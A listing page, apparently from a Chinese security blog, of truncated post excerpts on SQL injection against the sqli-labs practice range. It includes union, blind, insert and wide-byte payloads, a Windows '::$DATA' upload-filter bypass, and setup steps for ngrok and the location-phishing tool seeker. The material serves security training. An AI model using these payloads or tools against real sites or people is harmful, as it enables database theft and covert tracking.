摘要： payload:% payload:aa' or 1=1 # payload:%' order by 5 # payload:%' order by 6 # payload:%' union select 1,2,3,4,5 # payload:%' union select 1,user(),ve 阅读全文

摘要： 大纲： 一、::$DATA漏洞（仅限Win） 在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当 成文件流处理,不会检测后缀名，且保持::$DATA之前的文件名，它的 目的就是不检查后缀名 例如:"phpinfo.php::$DATA" Windows会自动去掉末尾的: 阅读全文

摘要： // 移动并重命名ngrok（可选） sudo mv ngrok /usr/bin/ngrok // 给予执行权限 sudo chmod +x /usr/bin/ngrok // 认证令牌 ngrok authtoken <你的ngrok认证令牌> //seeker安装 git clone http 阅读全文

摘要： 靶场：sqli-labs第二十四关 先注册一个账号 Mysql原始注册语句： insert into users ( username, password) values("test", "123456") 修改账号密码,把之前123456修改123 Mysql原始注册语句： UPDATE user 阅读全文

摘要： 靶场环境：sqli-labs第五关 可以使用payload：?id=1 ' and (select count(*) from users)>0 --+ 测试是否存在users这个表 第一步：获取数据库长度 使用length()函数,且盲注必须使用and 例：length(database())=3 阅读全文

摘要： insert 注入 如何向数据库插入数据？ 原始Mysql插入语句: insert into member(username,pw,sex,phonenum,address,email) valus('user01',123456,1,2,3,4); payload: user01' or upda 阅读全文

摘要： Msql原始语句:select id,email from member where username='\'' //输入的是 ' 结果变成 payload：1%df' union select 1,database()# 可以看到Msql语句中 \ 已修改：select id,email from 阅读全文

摘要： 参数类型注入（三种） 1，数字型 （sqli_labs Less2） select * from tony where id=1 select * from tony where id=-1 union select 1,database（),user（） ID：-1 union select 1, 阅读全文

摘要：   ![](https://im 阅读全文

摘要： 第一步 http://192.168.1.117/sqli-labs/Less-1/?id=' union select 1,2,3 --+ //构建语句 阅读全文